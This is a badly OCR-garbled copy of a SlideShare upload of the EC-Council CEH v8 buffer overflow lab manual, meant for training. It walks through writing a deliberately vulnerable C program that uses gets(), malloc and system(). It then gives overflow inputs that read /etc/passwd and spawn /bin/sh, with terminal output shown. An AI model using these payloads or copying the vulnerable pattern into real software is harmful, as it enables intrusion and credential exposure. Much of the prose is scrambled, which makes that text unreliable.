Ceh v8 labs module 18 buffer overflow

415 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
415
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
86
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Ceh v8 labs module 18 buffer overflow

  1. 1. CEH B u ffe r L ab M a n u a l O v e r flo w M o d u le 18
  2. 2. M odule 18 - B u ffer O verflo w B u f f e r O v e r f lo w A tta c k In ab ffe oefo , w ilew gda t abiffer, t eb/ffer’ b u d r is u r v rl w h ritin ta o h s o n ay o er nan a ja e tmmr iso ewite . v ru d d c n e oy v r r t n I CON KEY Lab Scenario V a lu a b le i n t o r m a d o a ________ S o u r c e : h t t p : / / w w w . 1c .u 1 1ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w Test yo u r H a c k e r s c o n t in u o u s ly lo o k t o r v u ln e r a b ilit ie s 11 1 s o f tw a r e o r a c o m p u t e r t o b r e a k in t o k n o w le d g e th e s y s te m b y e x p lo it in g th e s e v u ln e r a b ilit ie s . sA W e b e x e rc is e m W o r k b o o k r e v ie w T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w a p ro g ra m 1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t lie s w i t h i n it s v a l i d r a n g e . A a w e a k n e s s b y s u b m it t in g a n e x tr a - lo n g in p u t t o its a llo c a t e d i n p u t b u f f e r ( t e m p o r a r y v a r ia b le s , a tta c k , w h e r e f a ilu r e o c c u r s e ith e r 1 1 1 a llo c a t in g s u f f ic ie n t m e m o r y f o r a n i n p u t s t r in g o r cause th e p ro g ra m to h a c k e r c a n e x p lo it s u c h th e p r o g r a m , d e s ig n e d t o s to ra g e a re a ) a n d m o d if y ju m p to u n in te n d e d o v e r f lo w th e v a lu e s o f n e a r b y p la c e s , o r even r e p la c e th e p r o g r a m 's in s t m c t i o n s b y a r b it r a r y c o d e . I f th e b u f fe r o v e r f lo w b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e b y d ir e c d y fe e d in g th e o r d in a r y s y s te m p o is o n o u s p o is o n o u s in p u t s tr in g t o o l o r a p p lic a tio n , w i t h s tr in g w i d i a d o c u m e n t o r a n p a s s iv e b u f f e r o v e r f lo w o v e r f lo w bugs to th e d a e m o n . I f th e d ir e c t a c c e s s , th e e m a il w h ic h , o n c e a tta c k . S u c h a tta c k s a re e q u iv a le n t t o th e s y s te m w i d i d ie s a m e u s e r I D B u ffe r no a re d o e s n o t p r o v id e s b u i lt - i n b u g lie s 1 1 1 a n h a c k e r a tta c h e s th e o p e n e d , w i l l la u n c h a a h a c k e r lo g g in g in t o a n d p r iv ile g e s a s d ie c o m p r o m is e d p r o g r a m . e s p e c ia lly co m m o n a rra y b o u n d 111 C p ro g ra m s , s in c e t h a t la n g u a g e c h e c k in g , a n d u s e s a f in a l n u l l b y te t o t h e e n d o t a s t r in g , in s te a d o f k e e p in g it s le n g t h 1 1 1 a s e p a ra te f ie ld . T o m a rk m ake dungs w o r s e , C p r o v id e s m a n y lib r a r y f u n c t io n s , s u c h as s t r c a t a n d g e t l i n e , w h ic h c o p y s tr in g s w i t h o u t a n y b o u n d s - c h e c k in g . A s an eth ical h a c k e r e x p e rt k n o w le d g e o f w h e n a n d h o w b a se d and b u ffe r o v e r f lo w s h eap -b ased b u f fe r o v e r f lo w 111 p en etration te s te r, and b u f fe r o v e r f lo w b u f f e r o v e r flo w s , p e r f o r m p ro g ra m s , and ta k e you m ust have o c c u rs . Y o u m u s t u n d e rs ta n d sound sta c k s- pen etratio n te s ts f o r d e t e c t i n g t o p revent p r o g r a m s f r o m p r e c a u t io n s a tta c k s . Lab Objectives T h e o b je c t iv e o v e r f lo w o f t i n s la b is t o a tta c k s t o 1 1 1 t in s la b , y o u h e lp s tu d e n ts t o le a r n a n d p e r f o r m n e e d to : ■ P r e p a re a s c r ip t t o ■ C E H Lab Manual Page 902 b u ffe r e x e c u te p a s s w o r d s . o v e r f lo w b u ffe r R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  3. 3. M odule 18 - B u ffer O verflo w ■ ■ & This lab can be d e m o n stra te d using B ack track Virtual M achine P e rfo rm p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n E n u m e ra te a p a s s w o r d lis t Lab Environment W indows Server 2012 ■ A c o m p u te r r u n n in g w ith ■ A V i r t u a l M a c h in e r u n n in g w i t h ■ A w e b b ro w s e r w ith In te rn e t access ■ as H o s t m a c h in e A d m in is t r a t iv e p r iv ile g e s t o 1 1 1 1 1 t o o ls B ack T rack 5 R3 Lab Duration T i m e : 2 0 A J in u t e s Overview of Buffer Overflow B u ffe r o v e r f lo w o v e rru n s th e is an b u f f e r 's a n o m a ly w h e r e b o u n d a ry and a p r o g r a m , w h ile o v e r w r it e s w n tin g d a ta a d ja c e n t m e m o r y . T in s to is a b u ffe r, a s p e c ia l c a s e o f v io la d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e tr ig g e r e d b y in p u t s d ia t a re d e s ig n e d t o e x e c u te c o d e , o r a lte r th e w a y th e p r o g r a m 111 e r r a tic c ra s h , o r p ro g ra m b e h a v io r , a o f s y s te m b re a c h in c lu d in g m e m o ry s e c u r it y . T h u s , access t lie v a re o p e r a te s . T i n s m a y r e s u lt e rro rs , th e in c o r r e c t b a s is o f m any r e s u lt s , a s o ftw a r e v u ln e r a b ilit ie s a n d c a n b e m a lic io u s ly e x p lo it e d . Lab Tasks 2 TASK 1 * Overview R e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w : ■ E n u m e r a t in g P a s s w o rd s 11 1 “ D e f a u lt P a s s w o r d L is t ” o W r it e a C o d e o C o m p ile d ie C o d e o E x e c u te th e C o d e o P e rfo rm o O b t a i n C o m m a n d S h e ll B u ff e r O v e r f lo w A t ta c k Lab Analysis A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e la b e x e r c is e . G i v e y o u r o p i n i o n o n y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e . P L E A S E T A L K T O Y O U R I N S T R U C T O R R E L A T E D C E H Lab Manual Page 903 T O T H I S I F Y O U H A V E Q U E S T I O N S L A B . Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  4. 4. M odule 17 - B u ffer O verflo w B u f f e r O v e r flo w E x a m p le In ab rf ro ejlo , w ilew da t abrf r t eb ffe'sb u d r is /fe v i w h riting ta o /fe, h u r o n ay o er nan a ja e t■ e oyiso ewite . v ru d d c n mmr v r r t n I C O N K E Y Lab Scenario / V a lu a b le in f o r m a tio n y* 111 c o m p u te r s e c u r it y and p r o g r a m m in g , a b u ffe r o v e r f lo w , 0 1‫ ־‬b u ffe r o v e rru n , v u ln e r a b ilit y a p p e a rs w h e r e a n a p p lic a tio n n e e d s t o r e a d e x t e r n a l in f o r m a t io n s u c h as T est yo ur k n o w le d g e a c h a r a c te r s trin g , th e s iz e s W e b e x e rc is e m W o r k b o o k r e v ie w o f d ie in p u t r e c e iv in g s tr in g , and b u t t e r is r e l a t i v e l y th e a p p lic a tio n s m a ll c o m p a r e d d o e s n 't check th e to th e s iz e . p o s s ib le T lie b u ffe r a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g fu n c tio n s , s u c h o v e r f lo w in g a s lo c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d s t r in g c a n a lte r s u c h in f o r m a t io n . T in s th e re tu rn a d d re s s . T lie a ls o m e a n s t h a t a n a t ta c k e r c a n c h a n g e th e in f o r m a t io n as h e 0 1 ‫ ־‬s h e w a n ts to . F o r e x a m p le , th e a tta c k e r c a n in je c t a s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t r i n g d i a t a l s o l e a d s t o th e e x e c u tio n o f th e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d re s s t o t h e a d d re s s o f th e a t ta c k c o d e . T l ie u l t i m a t e g o a l is u s u a lly t o g e t c o n t r o l o f a p r iv i le g e d s h e ll b y s u c h m e t h o d s . P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s i n c l u d e C + + , w h ic h p r o v id e b u ilt - in 110 p r o te c tio n C and a g a in s t a c c e s s in g 0 1 ‫ ־‬o v e r w r i t i n g d a ta 1 1 1 a n y p a r t o f m e m o r y a n d d o n o t a u t o m a tic a lly c h e c k d ia t d a ta w r i t t e n t o a n a r r a y (th e b u ilt - in b u ffe r ty p e ) is w i d i i n th e b o u n d a r ie s o f d ia t a rra y . B ounds c h e c k in g can p r e v e n t b u f f e r o v e r f lo w s . A s a pen etratio n te ste r, s m a s lu n g o v e r f lo w t im e a tta c k s . Y o u a tta c k s . Y o u checks, a d d re s s y o u s h o u ld b e a b le t o im p le m e n t p r o t e c t io n m ust can be a w a re o f p re v e n t b u ffe r o b f u s c a t io n , a ll d ie d e fe n s iv e o v e r f lo w r a n d o m iz in g a tta c k s lo c a tio n a g a in s t s t a c k - m e a s u re s by o f fo r b u ffe r im p le m e n tin g fu n c tio n s 111 11111- lib c , a n a ly z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s s u c h as J a v a , M L , e tc . Lab Objectives T h e o b je c t iv e o v e r f lo w o f t i n s la b is t o 1 1 1 t in s la b , y o u C E H Lab Manual Page 904 h e lp s tu d e n ts t o le a r n a n d p e r f o r m b u ffe r t o e x e c u te p a s s w o r d s . n e e d to : Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  5. 5. M odule 17 - B u ffer O verflo w ■ P r e p a re a s c r ip t t o o v e r f lo w b u ffe r ■ R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n ■ P e rfo rm ■ E n u m e ra te p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n a p a s s w o r d lis t Lab Environment I T This lab can be d e m o n stra te d using B ack track Virtual M achine W indows Server 2012 ■ A c o m p u te r r u n n in g w ith ■ A Y i r m a l M a c h in e r u n n in g w i t h ■ A w e b b ro w s e r w ith ■ as H o s t m a c h in e Administrative privileges to run tools B ack T rack 5 R3 Internet a c c e s s Lab Duration T im e : 2 0 M in u t e s Overview of Buffer Overflow B u ff e r o v e r f lo w ta k e s p la c e w h e n buffer b e c a u s e o f i n s u f f i c i e n t m em ory a d d re sse s, w h i c h a r e t h i s o c c u r s w h e n c o p y i n g strin g s o f w r itte n to a c o rru p ts t h e d a t a v a l u e s 1 1 1 allo cated b u f f e r . M o s t o f t e n f r o m on e buffer to another. b o u n d s c h e c k in g a d ja c e n t t o th e c h a ra c te rs d a ta W hen die following program is compiled and run, it will assign a block o t memory 1 bytes long to hold die attacker string, strcpy function will copy the string 1 “ D D D D D D D D D D D D D D ” into an attacker string, w hich will exceed the buffer size o f 11 bytes, resulting 111 buffer overflow. Bffe Oe wxmleCd u r vrflo Ea p oe #include<stdio.h> int main ( int argc, char **argv) { char Bufferfll] = ‫״‬AAAAAAAAAA‫;״‬ strcpylBuffer/DDDDDDDDDODD‫;}״‬ printf(“96n‫ .״‬Buffer); 0 0 1 2 3 4 5 6 7 8 9 1 1112 0 D D D D D D D D D D D D o ■ c 3 4 5 6 7 8 9 A A A A A A A A A A 1 2 3 4 String 10 0 i S7 6‫״‬ return ; } This type o f vulnerability is prevalent in UNIX• and NT-based systems Lab Tasks S TASK 1 W rite a Code C E H Lab Manual Page 905 1. Launch your B ack T rack 5 R3 Virtual Machine. 2. For btlogui, type root and press Enter. Type the password as toor, and press E nter to log 111 to BackTrack virtual machine. Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  6. 6. M odule 17 - B u ffer O verflo w BackTrack on WIN 2N9STOSGIEN Virtual Machine Connection ‫־‬R ‫ * ״‬T ‫ י‬kVia C lipboard V iew @3 1 ‫ ►וו‬h ‫פ‬ i . 0933761 HET: Registered protocol fa n ily 17 1 9 5 1 in u A T n ted Set 2 k y o rd a /d ;icc p tfo vi8 1 /'s 0 p t/'in u .0 1 3 1 p t: T ra sla e b a s c1 s^ la r1 ' l> 2 crio /in u p tl 1.0952761 Registering the dns resolver key type 1.0957031 registered ta sk stats version 1 1.1639921 Magic nunber: 12:12U:12G 1.1644561 acpi device:01: hash notches 1.105658) rtc.cn os 00:02: settin g syste* clock to 2012-09-25 11:06:59 UTC(1340571219) 1.165468) BIOS E O f a c il it y v0.16 2004-Jun-25, 0 devices found D 1.1658621 C D information not availab le. O 1.2378181 a ta l.0 6 : ATA-8: Uirtual HD, 1 .1 .0 , raax M D A U M2 1.2389361 a ta l.0 6 : 33554432 scctors, nu lti 12B: LBA48 1.2415511 ata2.06: AIAPI: Uirtual CD, , waxhUDt1A 2 1.2432671 ata2.06: configured for M D U I1n2 1.2441181 a ta l.0 6 : configured for flU H D flZ 1.244223) s c s i 0:0:0:6: Direct-Access A TA Uirtual H O 1 .1 . PQ: 6 AMSI: 5 1.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0‫׳‬ GiB) 1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks 1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff 1.2463841 sd 0:0:0:0: Attached sc si generic sgO type 0 1.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support D nr FIX PT 1.2404231 sc s i 1:0:0 0: CD R M O Hsft Uirtual CD/RO M 1.0 PQ: 6 ANSI 5 1.2515061 sr6: sc si3 nnc drive: 0x/0 k tray 1.2526091 cdron: Uniform C H M driver Revision: 3.26 D U 1.2527931 sr 1:0:0:0: Attached sc si generic sg l type 5 1.25U657) sda: sdal r,da2 < xda5 > 1.2506591 *d 0:0:0:0: Inda I Att<1ch«d 8C5I disk 1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd 1.2608041 Urite protectI 1 | the karnal read only data: 1228Hk M 1.26S6241 Freeing unused kernel Mwinj: 1732k freed 1.2699051 Freeing unused kernel »e 1 1 1492k freed *nr j: ling, please w a it. . . 1.2873151 udcv: starting version 151 1.2962U0I udevd (03): /•prot/‫׳‬U3/oun adj is deprecated, please use /p roc/tlJ/w n score adj instead. 1.3963921 Floppy driv e (s): fdO is 1.44f1 1.41 HH4 I FD 6 is an 02070. C 2.02030?) Refined T8C clocksource calibration: 3692.970 fti‫. .־‬ ‫׳‬ F IG U R E 1.1: BackTrack Log in __ B u ffer overflow occurs 3. T ype s ta rtx t o la u n c h d ie G U I . when a program or process BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection tries to store m ore data in a ■ Re 1-1°‫־* ־‬ I.V44 CSpbeard Vie I't • (- ©3 1 1 h > 1► buffer. 1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff 1.246384) sd 0:0:6:6: Attached sc si generic sy6 type 6 1.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU1 1.2404231 sc si 1:6:6:0: C R M D O Msft Uirtual C D-RO M 1 0 PQ: 6 AMSI: 5 l.25150bl sr6: sc si3 ‫־‬rwc drive: 0x/0‫־‬x tray 1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.20 1.2527931 sr !:0:6:6: Attached sc si generic sy l type 5 I .2586571 sda: sdal sda2 < sda5 > 1.2506591 sd 0:0:6 6: (sdal Attaclied SCSI disk 1.2602631 Freeing unused kernel ncmury: 'J6Uk freed 1 .2608041 N rite protecting the kernel read-only data: 122IM Ik 1.265624) Frrelny umis.d kern■• I fiiMitry: 1732k freed 1.269985) Freeing unused kern•I nonary: 1492k freed ading, please u a i t ... 1.2873151 udev: starting version 151 1.29620BI udevd (83): /‫׳‬prc!c/H3/’ 0«jr»_<1dj is deprei^ted, please use /proc/G3‫׳׳‬o«1*»_score_adj instead. 1.3963921 Floppy driv e (s): fd6 is 1.440 1.4133841 FK 6 la an H2678. 2.0203071 R.rfl1 d TSC clocksource calibration: 3692 .970 MHz. » cklrack 5 IQ - 64 Bit bt t ty l y la tined out a fter 60 seconds. System information as of Iuc Sep 25 16:45:47 1ST 2012 Systea load: Usage o f ✓: Oenortj usage: Swap usage: 0.08 72.3* o f 15.23GB 35‫׳׳‬ O k Processes: 72 Users logged In: 0 IP address for eth6: 10.0.0.14 Graph th is data and ■nrvvjr th is syste* ot https:/✓landscape.canonical .con✓ F IG U R E 1.2: BackTrack G U I Login-Startx Comm and 4. m B ackT rack 5 R3 G U I d e s k to p o p e n s , as s h o w n in d ie f o llo w in g s c r e e n s h o t. Code w h ich is entered in kedit is case-sensitive. C E H Lab Manual Page 906 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  7. 7. M odule 17 - B u ffer O verflo w F IG U R E 1.3: BackTrack 5 R3 Desktop 5. B ackT rack A pplications gedit T ext Editor. S e le c t t h e ‫־‬ y t. >r* * v A cc esso rie s ‫/ ל‬Mem (»_J * ^ ^ BackTtock m e n u , a n d t h e n s e le c t ^ Oik uwg* Analyzer oedlt T t Editor fcx 4& #***% £ internet flPlom ce | TWmlrwl )14 other ‫ס‬ Tkrminator WKSound 6 V^deo 0 ca System Tools << b a c k tra c k Program ming languages com m only associated w ith buffer overflows include C and C + + . F IG U R E 1.4: Launching gedit Text E d itor 6. E n t e r d ie f o llo w in g c o d e 11 1 g e d it T e x t E d it o r (Note: t h e c o d e is c a s e - s e n s itiv e ) . # i n c l u d e < s t d i o . h> v o i d m a i n () { c h a r *name; c h a r *command; n ame =( ch ar * ) m a l l o c ( 10) ; command=(char * ) m a l l o c (128) ; p r i n t f ( " a d d r e s s o f name i s : %dn", name) ; p r i n t f ( " a d d r e s s o f command i s : %dn",command); p r i n t f ( " D i f f e r e n c e be twe en a d d r e s s i s : %d n", commandC E H Lab Manual Page 907 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  8. 8. M odule 17 - B u ffer O verflo w n ame ); p r i n t f ( " E n t e r y o ur n a m e : " ) ; gets(name); p r i n t f (" H e l l o % s n ", n a me ) ; syst em( command) ; } ‫>׳׳‬ v x *u n s a v e d Docum ent 1 ‫ ־‬g e d it File Edit View Search Tools Documents Help ^^^Jo p e n ▼ ^_Save Undo ^ 9k Ii=y1 Code is compiled using the follow ing commend: gee n *Unsaved Document 1 X buffer.c biiffer. # 1 nclude<std1 0 .h> vo id m ain () { char •name; char •command; name=(char * )m a llo c (1 0 ); command=(char * )m a llo c (1 2 8 ); p r in t f ( " a d d r e s s o f name i s : %dn",nam e); p r in t f ( " a d d r e s s o f command is:%dn",com m and); p r i n t f ( “ D iffe r e n c e between address i s :%dn“ ,command-name); p r i n t f ( " E n t e r your name:“ ) ; g e ts(n am e); p r i n t f C ’H e llo %sn",nam e); system ( command) ; Plain Text ▼ Tab Width: 8 ▼ Ln 15, Col 2 F IG U R E 1.5: W riting code fo r execution 7. ‫ט‬ s a v e d ie p r o g r a m S ave as s h o w n 111 th e f o llo w in g s c re e n s h o t s c re e n s h o t as b u ffe r .c . N o to o l can solve completely die problem o f buffer overflow , but die)‫■׳‬ b y s e le c tin g File ‫ )־־‬S ave A s‫ )־‬root N o w o r s im p ly c lic k __ _* *Unsaved Document 1 ‫ ־‬g edit File Edit View Search Tools Documents Help surely can decrease the probability o f stack smashing attacks. N o w Compile th e Code C E H Lab Manual Page 908 la u n c h d ie c o m m a n d t e r m in a l a n d c o m p ile d ie co d e by running: gcc b u f f e r . c -o b u f f e r Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  9. 9. M odule 17 - B u ffer O verflo w /v v x root@bt: - File Edit View Terminal Help root@ bt: ‫| #־־‬gcc b u ffe r.c -0 b u ffe rfj The program executes using follow ing command: .!buffer F IG U R E 1.7: BackTrack com piling the code 9. I f th e re a re a n y e rro rs , /v v X ignore th e m . r o o tc a b t: - File Edit View Terminal Help ro o tg b t:-# gcc b u ffe r .c ■0 b u ffe r b u ffe r .c : In fu n c tio n 'm a in ': — b u f fe r . c : 6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n ‘ mal loc1 ^•—— — ‫׳‬ b u f fe r . c : 8 : w arning: form at '%d' expects type 1 " ‫־‬n t ' , but a rg u m e n t^'tts s type 'ch ar • ‫׳‬ b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch ar »' g b u f f e r . c : 1 0 : w arning: form at '%d' expects type ' i n t ‫ , ׳‬but a rg um ent# has type ' I ong i n t ' /tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ': b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t be used. root@bt:~# [ ] : b a c k I tra c k F IG U R E 1.8: BackTrack E rro r Message W in d o w — j 1 0 . T o e x e c u te th e p r o g r a m ty p e . /buffer E x ecu te th e Code C E H Lab Manual Page 909 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  10. 10. M odule 17 - B u ffer O verflo w ‫־‬ ‫־‬ * ro o t@ b t: ~ File Edit View Terminal Help r o o tg b t: •‫/ . | #־‬b u f fe r | address o f name is : 20144144 address o f command i s :20144176 D iffe re n c e between address is :32 E nter your name:| m 1 A n executable program ■ o n a disk contains a set o f binary instructions to be executed by die processor. t r a c k ^ )1 back . ‫ם‬ F IG U R E 1.9: BackTrack Executing Program 1 1 . T y p e a n y n a m e 1 1 1 d ie Input h e ld a n d p re s s Enter; h e re , u s in g Jaso n as a n exam ple. » - :v x ro o t@ b t File Edit View Terminal Help root@bt:~# address o f address o f D iffe re n c e Enter your ca B u ffer overflows w o rk by manipulating pointers . /b u f f e r name is : 20144144 command i s : 26144176 between address is : 32 name:|‫ נ‬as | b a ck I tra c k (including stored addresses). F IG U R E 1.10: In p u t Field 12. Hello J a s o n C E H Lab Manual Page 910 s h o u ld b e p r in t e d . Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  11. 11. M odule 17 - B u ffer O verflo w / - :v x ro o t@ b t File Edit View Terminal Help root@bt:~# address o f address o f D iffe re n c e E n te r your ./ b u ffe r name i s : 26144144 command i s : 20144176 between address i s : 32 name: Jason ‫״‬oot®bt:~# fl b a c k I tra c k F IG U R E 1.11: H ello Jason B T A S K 4 Perform Buffer Overflow A ttack 1 3 . N o w , o v e r f lo w t h e b u f f e r a n d e x e c u te t h e lis te d s y s te m c o m m a n d s . 14. R u n d ie p r o g r a m 15. T y p e Input a g a in b y t y p i n g ./buffer. 12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e h e ld . 1 6 . Y o u c a n v ie w a p r i n t o u t o f d i e p a s s w o r d h ie . a v ‫א‬ ro o t@ b t: - File Edit View Terminal Help root@ bt:~# ./ b u ffe r address o f name i s : 17747984 address o f command i s :17748016 D iffe re n c e between address i s :32 E n te r your name:|12345678912345678912345678912345cat /etc/passwd| H e llo 12345678912345678912345678912345cat /etc/passwd r o o t: x : e : 0 : r o o t: / r o o t: /bin/bash daemon: x : 1 : 1 : daemon: /us r / s b in : /bin/sh bin:x :2 :2 :bin:/bin:/bin/sh sys: x : 3 : 3 : sys: /d e v : /bin/sh Buffer overflow vulnerbililties typically occur in code that a programmer cannot accratelv predict buffer overflow behvior. sync: x : 4 :65534:sync: / b i n : /b in /s y n c games: x : 5 : 60: games: /us r/games: /bin/sh man: x : 6 : 1 2 : man: /v a r/cache/m an: /b in /s h I p : x : 7 : 7 : I p : / v a r / s p o o l/lp d : /b in /s h m a il: x^S: 8 : m a il: /va r/m aiU / b in / sh _ news: x t : 9: news: /va r/sp o jj/n e w s: /tj^n/shg luiicp: x :1 e : l e : ifticjfc/var/spdol/uucp ijrbinTMf proxy :x: 13:13:proxy:/b1n:/b1n/sh I L w w d ata:x:3 3 :3 3 :w w w - d ata:/var/w w */b inft(l I I backup: x : 3 4 :34 :backup: /v a r/ b a ck u p f/ b in / sh U s t :x :3 8 :3 8 :H a ilin g L i s t H a n a g e r :/ v a r / lis t:/ b in / s h i r e : x :3 9 :3 9 :i re d : /va r / ru n / i re d : /bin/sh g n a ts :x :4 1 :4 l:G n a ts Bug-Reporting System (a d m in ):/ v a r/ lib / g n a ts :/ b in / s h ( lib u u id : x :1 0 0 :1 6 1 ::/ v a r / lib / lib u u ld : /bin/sh F IG U R E 1.12: Executing Password ■m. T A S K 5 Obtain Com m and Shell C E H Lab Manual Page 911 1 7 . N o w , o b t a i n a C o m m a n d S h e ll. 18. a g a i n ./buffer a n d t y p e 12345678912345678912345678912345/ b i n / s h 111 the Input field. R u n d ie p r o g r a m Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  12. 12. M odule 17 - B u ffer O verflo w / v v x root@ bt: - File Edit View Terminal Help m root@bt:~# . / b u f f e r address o f name is : 24616976 address o f command i s :24617008 D iffe re n c e between address is :32 E nter your nameJ12345678912345678912345678912345/bm/sh| H e llo 12345678912345678912345678912345/bin/sh s h-4.1# s h-4.1# sh-4.1# [ ] Code scrutiny (writing secure code) is die best possible solution to b uffe rflow attacks. back tra c k F IG U R E 1.13: Executing 12345678912345678912345678912345/bin/sli 19. T y p e Exit 1 1 1 S h e ll K o n s o l e 0 1 ‫ ־‬c lo s e t h e p r o g r a m . Lab Analysis A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e la b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1 y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e . T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d ■ A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6 ■ A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8 ■ D iffe r e n c e ■ E n te r y o u r n a m e : b e t w e e n a d d r e s s is : 3 2 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in / s h B u ffe r O v e rflo w ■ H e llo 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in /s h ‫י‬ T A L K T O s h -4 .1 # ‫י‬ P L E A S E s h -4 .1 # ‫י‬ s h -4 .1 # Y O U R I N S T R U C T O R R E L A T E D C E H Lab Manual Page 912 T O T H I S I F Y O U L A B . H A V E Q U E S T I O N S
  13. 13. M odule 17 - B u ffer O verflo w Questions 1. E v a lu a t e v a r io u s m e th o d s t o 2. A n a ly z e h o w 3. E v a lu a t e a n d lis t th e c o m m o n c a u s e s o f b u f f e r - o v e r f lo w .N E T I n te r n e t D C E H Lab Manual Page 913 d e te c t r u n - tim e b u f f e r o v e r f lo w . e rro rs u n d e r la n g u a g e . C o n n e c tio n Y e s P la tf o r m 0 to p r e v e n t b u f f e r o v e r f lo w . R e q u ir e d 0 N o S u p p o r te d C la s s r o o m 0 !L a b s Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

×